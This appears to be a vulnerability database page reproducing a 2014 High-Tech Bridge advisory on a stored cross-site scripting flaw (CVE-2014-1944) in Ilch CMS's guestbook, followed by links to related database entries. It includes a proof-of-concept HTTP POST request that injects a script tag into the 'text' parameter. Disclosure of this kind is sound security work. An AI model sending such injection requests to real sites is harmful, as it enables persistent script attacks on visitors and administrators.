Lucene search
High-Tech BridgeHTB23203HistoryFeb 12, 2014 - 12:00 a.m.
Cross-Site Scripting (XSS) in Ilch CMS
2014-02-1200:00:00
High-Tech Bridge
www.htbridge.com
25
0.003 Low
EPSS
Percentile
67.8%
High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application.
- Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944
The vulnerability exists due to insufficient sanitisation of user-supplied data in βtextβ HTTP POST parameter passed to β/index.php/guestbook/index/newentryβ URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userβs browser in context of the vulnerable website when the victim visits the βhttp://[host]/index.php/guestbook/index/indexβ URL.
The exploitation example below uses the JavaScript βalert()β function to display βimmuniwebβ word:
POST /index.php/guestbook/index/newentry HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40e mail.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert(βimmuniwwebβ);</s cript>&saveEntry=Submit
Related
packetstorm
packetstorm
Ilch CMS 2.0 Cross Site Scripting
2014-03-05 00:00:00
seebug
seebug
Ilch CMSθ·¨η«θζ¬ζΌζ΄
2014-03-10 00:00:00
prion
prion
Cross site scripting
2014-03-09 13:16:00
nvd
nvd
CVE-2014-1944
2014-03-09 13:16:56
zdt
zdt
Ilch CMS 2.0 - Persistent XSS Vulnerability
2014-03-05 00:00:00
exploitpack
exploitpack
Ilch CMS 2.0 - Persistent Cross-Site Scripting
2014-03-05 00:00:00
securityvulns
securityvulns
Cross-Site Scripting (XSS) in Ilch CMS
2014-05-04 00:00:00
cve
cve
CVE-2014-1944
2014-03-09 13:16:56
cvelist
cvelist
CVE-2014-1944
2014-03-07 20:00:00
exploitdb
exploitdb
Ilch CMS 2.0 - Persistent Cross-Site Scripting
2014-03-05 00:00:00